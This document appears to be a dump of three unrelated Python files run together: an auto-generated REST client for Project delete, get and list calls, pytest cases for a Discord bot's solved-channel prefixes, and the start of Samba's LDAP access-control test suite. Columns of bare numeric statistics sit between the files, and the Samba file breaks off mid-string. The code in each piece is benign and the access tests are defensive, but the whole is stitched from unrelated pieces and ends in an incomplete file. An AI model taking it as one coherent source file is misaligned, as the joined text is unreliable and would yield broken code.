def delete_project(self, name, **kwargs): # noqa: E501
"""Deletes the given `Project` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_project(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_project_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_project_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_project_with_http_info(self, name, **kwargs): # noqa: E501
"""Deletes the given `Project` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_project_with_http_info(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProtobufEmpty', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_project(self, name, **kwargs): # noqa: E501
"""Returns the requested `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_project(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ApiProject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_project_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_project_with_http_info(name, **kwargs) # noqa: E501
return data
def get_project_with_http_info(self, name, **kwargs): # noqa: E501
"""Returns the requested `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_project_with_http_info(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ApiProject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiProject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_projects(self, **kwargs): # noqa: E501
"""Lists `Projects` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_projects(async=True)
>>> result = thread.get()
:param async bool
:param str filter: The filter expression.
:param int page_size: Number of projects to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListProjectsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_projects_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_projects_with_http_info(**kwargs) # noqa: E501
return data
def list_projects_with_http_info(self, **kwargs): # noqa: E501
"""Lists `Projects` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_projects_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str filter: The filter expression.
:param int page_size: Number of projects to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListProjectsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'page_size', 'page_token'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_projects" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'page_token' in params:
query_params.append(('page_token', params['page_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/projects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiListProjectsResponse', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.362998
| 113
| 0.59477
| 1,745
| 15,527
| 5.074499
| 0.098567
| 0.051496
| 0.025296
| 0.032524
| 0.913043
| 0.900169
| 0.881649
| 0.864935
| 0.859514
| 0.846189
| 0
| 0.020408
| 0.308881
| 15,527
| 426
| 114
| 36.448357
| 0.804771
| 0.065177
| 0
| 0.761062
| 1
| 0
| 0.163663
| 0.02956
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017699
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3dfe7c3a5b8234ba6f6a7fdbe0d3ff973159e5c5
| 6,766
|
py
|
Python
|
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
import pytest
from modules.solved.prefix import Prefix
from modules.solved import solved_constants
@pytest.mark.parametrize("channel,prefix,has_prefix",
[("help", solved_constants.SOLVED_PREFIX, False),
("help", solved_constants.BACKSOLVED_PREFIX, False),
("help", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.SOLVED_PREFIX, True),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.BACKSOLVED_PREFIX}-puzzle-2a", solved_constants.SOLVED_PREFIX, True),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.BACKSOLVED_PREFIX}-puzzle-2a", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-puzzle-2a", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.SOLVED_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.SOLVEDISH_PREFIX, True),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.SOLVED_PREFIX, False),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.BACKSOLVED_PREFIX, True),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.SOLVEDISH_PREFIX, False)])
def test_has_prefix(channel, prefix, has_prefix):
prefix = Prefix(channel, prefix)
assert has_prefix == prefix.has_prefix()
@pytest.mark.parametrize("channel,prefix,new_channel",
[("help", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}help"),
("puzzle1", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle1"),
("puzzle1", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle1"),
("puzzle1", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle1"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.BACKSOLVED_PREFIX}puzzle4")])
def test_add_prefix(channel, prefix, new_channel):
prefix = Prefix(channel, prefix)
if not prefix.has_prefix():
assert new_channel == prefix.add_prefix()
@pytest.mark.parametrize("channel,prefix,new_channel",
[("help", solved_constants.SOLVED_PREFIX, f"help"),
("puzzle1", solved_constants.SOLVED_PREFIX, f"puzzle1"),
("puzzle1", solved_constants.BACKSOLVED_PREFIX, f"puzzle1"),
("puzzle1", solved_constants.SOLVEDISH_PREFIX, f"puzzle1"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.BACKSOLVED_PREFIX, f"puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4")])
def test_remove_prefix(channel, prefix, new_channel):
prefix = Prefix(channel, prefix)
if prefix.has_prefix():
assert new_channel == prefix.remove_prefix()
| 102.515152
| 221
| 0.703665
| 707
| 6,766
| 6.373409
| 0.045262
| 0.39281
| 0.181092
| 0.26964
| 0.950954
| 0.936085
| 0.91589
| 0.848646
| 0.828229
| 0.731025
| 0
| 0.009308
| 0.190216
| 6,766
| 65
| 222
| 104.092308
| 0.813105
| 0
| 0
| 0.086207
| 0
| 0
| 0.461129
| 0.447236
| 0
| 0
| 0
| 0
| 0.051724
| 1
| 0.051724
| false
| 0
| 0.051724
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
9ae04b5105473e340a512a3a276b841e90a7c617
| 255
|
py
|
Python
|
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------------
# importation
#-------------------------------------------------------------------------------
# Main class Ml_tools
class ml_tools:
def __init__(self):
pass
| 21.25
| 80
| 0.235294
| 12
| 255
| 4.5
| 0.75
| 0.259259
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113725
| 255
| 12
| 81
| 21.25
| 0.238938
| 0.745098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
b131951047b23a4a0e0a098a042444f71cf57a6a
| 90,718
|
py
|
Python
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2019-01-13T09:16:31.000Z
|
2019-02-15T03:30:28.000Z
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | null | null | null |
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2020-03-08T01:58:25.000Z
|
2020-12-20T10:34:54.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This is unit with tests for LDAP access checks
import optparse
import sys
import base64
import re
sys.path.insert(0, "bin/python")
import samba
samba.ensure_external_module("testtools", "testtools")
samba.ensure_external_module("subunit", "subunit/python")
import samba.getopt as options
from samba.join import dc_join
from ldb import (
SCOPE_BASE, SCOPE_SUBTREE, LdbError, ERR_NO_SUCH_OBJECT,
ERR_UNWILLING_TO_PERFORM, ERR_INSUFFICIENT_ACCESS_RIGHTS)
from ldb import ERR_CONSTRAINT_VIOLATION
from ldb import ERR_OPERATIONS_ERROR
from ldb import Message, MessageElement, Dn
from ldb import FLAG_MOD_REPLACE, FLAG_MOD_ADD
from samba.dcerpc import security, drsuapi, misc
from samba.auth import system_session
from samba import gensec, sd_utils
from samba.samdb import SamDB
from samba.credentials import Credentials
import samba.tests
from samba.tests import delete_force
from subunit.run import SubunitTestRunner
import unittest
parser = optparse.OptionParser("acl.py [options] <host>")
sambaopts = options.SambaOptions(parser)
parser.add_option_group(sambaopts)
parser.add_option_group(options.VersionOptions(parser))
# use command line creds if available
credopts = options.CredentialsOptions(parser)
parser.add_option_group(credopts)
opts, args = parser.parse_args()
if len(args) < 1:
parser.print_usage()
sys.exit(1)
host = args[0]
if not "://" in host:
ldaphost = "ldap://%s" % host
else:
ldaphost = host
start = host.rindex("://")
host = host.lstrip(start+3)
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
creds.set_gensec_features(creds.get_gensec_features() | gensec.FEATURE_SEAL)
#
# Tests start here
#
class AclTests(samba.tests.TestCase):
def setUp(self):
super(AclTests, self).setUp()
self.ldb_admin = ldb
self.base_dn = ldb.domain_dn()
self.domain_sid = security.dom_sid(ldb.get_domain_sid())
self.user_pass = "samba123@"
self.configuration_dn = self.ldb_admin.get_config_basedn().get_linearized()
self.sd_utils = sd_utils.SDUtils(ldb)
#used for anonymous login
self.creds_tmp = Credentials()
self.creds_tmp.set_username("")
self.creds_tmp.set_password("")
self.creds_tmp.set_domain(creds.get_domain())
self.creds_tmp.set_realm(creds.get_realm())
self.creds_tmp.set_workstation(creds.get_workstation())
print "baseDN: %s" % self.base_dn
def get_user_dn(self, name):
return "CN=%s,CN=Users,%s" % (name, self.base_dn)
def get_ldb_connection(self, target_username, target_password):
creds_tmp = Credentials()
creds_tmp.set_username(target_username)
creds_tmp.set_password(target_password)
creds_tmp.set_domain(creds.get_domain())
creds_tmp.set_realm(creds.get_realm())
creds_tmp.set_workstation(creds.get_workstation())
creds_tmp.set_gensec_features(creds_tmp.get_gensec_features()
| gensec.FEATURE_SEAL)
ldb_target = SamDB(url=ldaphost, credentials=creds_tmp, lp=lp)
return ldb_target
# Test if we have any additional groups for users than default ones
def assert_user_no_group_member(self, username):
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % self.get_user_dn(username))
try:
self.assertEqual(res[0]["memberOf"][0], "")
except KeyError:
pass
else:
self.fail()
#tests on ldap add operations
class AclAddTests(AclTests):
def setUp(self):
super(AclAddTests, self).setUp()
# Domain admin that will be creator of OU parent-child structure
self.usr_admin_owner = "acl_add_user1"
# Second domain admin that will not be creator of OU parent-child structure
self.usr_admin_not_owner = "acl_add_user2"
# Regular user
self.regular_user = "acl_add_user3"
self.test_user1 = "test_add_user1"
self.test_group1 = "test_add_group1"
self.ou1 = "OU=test_add_ou1"
self.ou2 = "OU=test_add_ou2,%s" % self.ou1
self.ldb_admin.newuser(self.usr_admin_owner, self.user_pass)
self.ldb_admin.newuser(self.usr_admin_not_owner, self.user_pass)
self.ldb_admin.newuser(self.regular_user, self.user_pass)
# add admins to the Domain Admins group
self.ldb_admin.add_remove_group_members("Domain Admins", self.usr_admin_owner,
add_members_operation=True)
self.ldb_admin.add_remove_group_members("Domain Admins", self.usr_admin_not_owner,
add_members_operation=True)
self.ldb_owner = self.get_ldb_connection(self.usr_admin_owner, self.user_pass)
self.ldb_notowner = self.get_ldb_connection(self.usr_admin_not_owner, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclAddTests, self).tearDown()
delete_force(self.ldb_admin, "CN=%s,%s,%s" %
(self.test_user1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" %
(self.test_group1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.usr_admin_owner))
delete_force(self.ldb_admin, self.get_user_dn(self.usr_admin_not_owner))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
delete_force(self.ldb_admin, self.get_user_dn("test_add_anonymous"))
# Make sure top OU is deleted (and so everything under it)
def assert_top_ou_deleted(self):
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" % (
"OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
def test_add_u1(self):
"""Testing OU with the rights of Doman Admin not creator of the OU """
self.assert_top_ou_deleted()
# Change descriptor for top level OU
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.usr_admin_not_owner))
mod = "(D;CI;WPCC;;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("OU=test_add_ou1," + self.base_dn, mod)
# Test user and group creation with another domain admin's credentials
self.ldb_notowner.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_notowner.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
# Make sure we HAVE created the two objects -- user and group
# !!! We should not be able to do that, but however beacuse of ACE ordering our inherited Deny ACE
# !!! comes after explicit (A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA) that comes from somewhere
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
def test_add_u2(self):
"""Testing OU with the regular user that has no rights granted over the OU """
self.assert_top_ou_deleted()
# Create a parent-child OU structure with domain admin credentials
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
# Test user and group creation with regular user credentials
try:
self.ldb_user.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_user.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
# Make sure we HAVEN'T created any of two objects -- user or group
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
def test_add_u3(self):
"""Testing OU with the rights of regular user granted the right 'Create User child objects' """
self.assert_top_ou_deleted()
# Change descriptor for top level OU
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("OU=test_add_ou1," + self.base_dn, mod)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
# Test user and group creation with granted user only to one of the objects
self.ldb_user.newuser(self.test_user1, self.user_pass, userou=self.ou2, setpassword=False)
try:
self.ldb_user.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
# Make sure we HAVE created the one of two objects -- user
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" %
("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1",
self.base_dn))
self.assertNotEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" %
("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1",
self.base_dn) )
self.assertEqual(len(res), 0)
def test_add_u4(self):
""" 4 Testing OU with the rights of Doman Admin creator of the OU"""
self.assert_top_ou_deleted()
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
self.ldb_owner.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_owner.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
# Make sure we have successfully created the two objects -- user and group
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
def test_add_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
try:
anonymous.newuser("test_add_anonymous", self.user_pass)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
#tests on ldap modify operations
class AclModifyTests(AclTests):
def setUp(self):
super(AclModifyTests, self).setUp()
self.user_with_wp = "acl_mod_user1"
self.user_with_sm = "acl_mod_user2"
self.user_with_group_sm = "acl_mod_user3"
self.ldb_admin.newuser(self.user_with_wp, self.user_pass)
self.ldb_admin.newuser(self.user_with_sm, self.user_pass)
self.ldb_admin.newuser(self.user_with_group_sm, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.user_with_wp, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.user_with_sm, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.user_with_group_sm, self.user_pass)
self.user_sid = self.sd_utils.get_object_sid( self.get_user_dn(self.user_with_wp))
self.ldb_admin.newgroup("test_modify_group2", grouptype=4)
self.ldb_admin.newgroup("test_modify_group3", grouptype=4)
self.ldb_admin.newuser("test_modify_user2", self.user_pass)
def tearDown(self):
super(AclModifyTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn("test_modify_user1"))
delete_force(self.ldb_admin, "CN=test_modify_group1,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "CN=test_modify_group2,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "CN=test_modify_group3,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_wp))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_sm))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_group_sm))
delete_force(self.ldb_admin, self.get_user_dn("test_modify_user2"))
delete_force(self.ldb_admin, self.get_user_dn("test_anonymous"))
def test_modify_u1(self):
"""5 Modify one attribute if you have DS_WRITE_PROPERTY for it"""
mod = "(OA;;WP;bf967953-0de6-11d0-a285-00aa003049e2;;%s)" % str(self.user_sid)
# First test object -- User
print "Testing modify on User object"
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
self.sd_utils.dacl_add_ace(self.get_user_dn("test_modify_user1"), mod)
ldif = """
